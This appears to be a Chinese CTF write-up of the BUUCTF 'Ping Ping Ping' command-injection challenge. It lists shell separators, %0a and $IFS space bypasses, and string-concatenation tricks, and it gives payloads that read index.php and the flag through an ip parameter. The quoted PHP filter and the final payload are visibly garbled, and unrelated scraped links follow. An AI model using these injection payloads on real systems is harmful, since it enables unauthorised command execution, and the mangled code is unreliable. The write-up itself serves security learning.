buuctf[GXYCTF2019]Ping Ping Ping
buuctf[GXYCTF2019]Ping Ping Ping
这个题目的标题是pingping盲猜是关于命令执行的题目
打开环境后
只有一个/ip=?
应该是提示用get的方式来传参一个地址执行ping的操作
直接ping127.0.0.1
回显ping127.0.0.1的数据
说明是一道命令执行的题目
执行:?ip=127.0.0.1|ls
其中|的作用是命令分隔符
还有相关的符号
; --在 shell 中,是”连续指令”
& --不管第一条命令成功与否,都会执行第二条命令
&& --第一条命令成功,第二条才会执行
| --第一条命令的结果,作为第二条命令的输入
|| --第一条命令失败,第二条才会执行
这里采用|来执行
如果全部过滤
过滤了命令分割符,用%0a便可以分隔命令进行查看
127.0.0.1%0als
回显两个文件
直接访问flag.php
回显有过滤空格
既然过滤空格就绕过空格
常见的绕过符号有:
$IFS9、9 、9、IFS1、1、1、{IFS} 、%09(php环境下)、 重定向符<>、<、
{cat,flag.php} //用逗号实现了空格功能
采用{cat,flag.php} //用逗号实现了空格功能
构造payload:?ip=127.0.0.1|cat,flag.php
回显过滤了flag这个字符串
尝试拼接绕过;
a=fl;b=ag;aaab
构造:cat,a=fl;b=ag;aaab
回显相同
说明这种绕过方式没有用
那就先看一下index.php
构造:/?ip=127.0.0.1|cat,index.php
回显:
应该是,不能代替空格绕过
换一个?ip=127.0.0.1|cat%09index.php
回显:
再换
?ip=127.0.0.1|cat$IFS$2index.php
回显
/?ip=
|’|"|\|(|)|[|]|{|}/", ip,ip,ip,匹配)){
回preg_match("/&|/|?|*|<|[\x{00}-\x{20}]|>|’|"|\|(|)|[|]|{|}/", ip,ip,ip,匹配);
die(“fxck你的符号!”);
}else if(preg_match("//",ip))die("fxck你的空间!");elseif(pregmatch("/bash/",ip)){ die("fxck你的空间!"); }else if(preg_match("/bash/",ip))die("fxck你的空间!");elseif(pregmatch("/bash/",ip)){
die(“fxck您的庆典!”);
}else if(preg_match("/.*f.*l.*a.g./", $ip)){
die(“fxck你的标志!”);
}
a=shellexec("ping−c4".a=shell_exec("ping-c4".a=shellexec("ping−c4".ip);
echo"
";
print_r($a);
}
?>
发现过滤了很多包括空格、一些符号/.*f.*l.*a.g./、flag
构造拼接绕过?ip=127.0.0.1;a=g;cat$IFS1fla1fla1flaa.php
在源代码中找到flag
buuctf[GXYCTF2019]Ping Ping Ping相关推荐
- linux命令菜鸟ping,Linux ping命令
Linux ping命令 Linux ping命令用于检测主机. 执行ping指令会使用ICMP传输协议,发出要求回应的信息,若远端主机的网络功能没有问题,就会回应该信息,因而得知该主机运作正常. 语 ...
- 复制vmware overLay网络无法ping通 ping www.baidu.com可以
因为忘记关闭防火墙了!!!!! 要永久关闭!! 修改hostname https://blog.csdn.net/qq_27327261/article/details/109100219 关闭 ...
- linux使用ping命令ping本机,Linux下使用ping命令判断网络的好坏
简介 在Linux系统里面如果想判断网络的好坏,脑海中蹦出的第一个命令就是ping了. ping命令基本是最常用的网络命令,它可以用来测试与目标主机的连通性. ping通过发送ICMP ECHO_RE ...
- 虚拟机ping网关ping不通
虚拟机ping网关ping不通,可能自己遇到的比较奇特,开始访问正常,过一段时间就不正常,分享一下解决办法: 首先ping同网段的可以ping的通,说明vmnet8的ipv4不和虚拟机配置的vmnet ...
- 全网超详细的如何Ping特定的端口号,比如telnet Ping,nc Ping,nmap Ping等
文章目录 1. 文章引言 2. ping特定端口 2.1 使用telnet ping特定端口 2.2 使用nc ping特定端口 2.3 使用nmap ping端口 2.4 使用Powershell ...
- C# ping命令,ping网络状态
Ping ping = new Ping(); PingReply pingReply = ping.Send("192.168.1.1"); //网络状态 if (pingRep ...
- BUUCTF [GXYCTF2019] 禁止套娃
题目分析 这题对我这个小白来说好难理解,慢慢补坑吧.PHP很多常用的函数都不是很了解,命令执行也是呜呜呜感觉学得还不是很精通. 打开题目,只有如下: 看源码也没有什么东西,常见的信息泄露:robots ...
- BUUCTF | [GXYCTF2019]BabySQli
BUUCTF | [GXYCTF2019]BabySQli 一.必备基础知识 当=号被过滤了使用like,rlike绕过 当or被过滤了使用大小写绕过,双写绕过,&&绕过 二.实战化渗 ...
- BUUCTF [GXYCTF2019]Ping Ping Ping 1
[GXYCTF2019]Ping Ping Ping 1 在本题我们考察的是命令执行 已进入本关,我们发现他在询问 ?ip 我们先尝试输入 ?ip=127.0.0.1 发现访问成功 查询一下它的目录: ...
最新文章
- python投资组合
- sap采购订单更改记录_SAP系统如何实现减税:增值税16%
- 在JShell中尝试Java9 HTTP客户端和Process API
- spring学习(50):延迟加载
- navicat存储过程返回值为空_Excel VBA解读(128):Function过程详解——枯燥的语法...
- 文字识别_文字识别的应用
- 文本数据标注工具doccano【介绍最详细的一遍文章】
- 天池风控算法大赛来了!
- mysql删除密码代码_mysql 用户新建、受权、删除。密码修改
- 应有尽有,Python 程序员需要掌握的机器学习“四大名著”发布啦
- msfvenom制作简易后门程序
- AE模板自媒体频道订阅点赞模板网络视频点赞订阅图形动画
- 书论51 朱文长《续书断》
- 光速学会前端三件套之html
- 如何将SW工程图转换成CAD格式?
- 03_建立 Windows 和虚拟机 Ubuntu 共享文件夹
- 【无为则无心Python基础】— 18、Python字符串的格式化输出
- 视频监控系统中流媒体服务器的主要功能,流媒体存储服务器在视频监控中被正确使用?它有哪些显著的优点?...
- 你很聪明,思维也很敏捷,小有才华,为什么依然一事无成?
- 微信小程序使用日历插件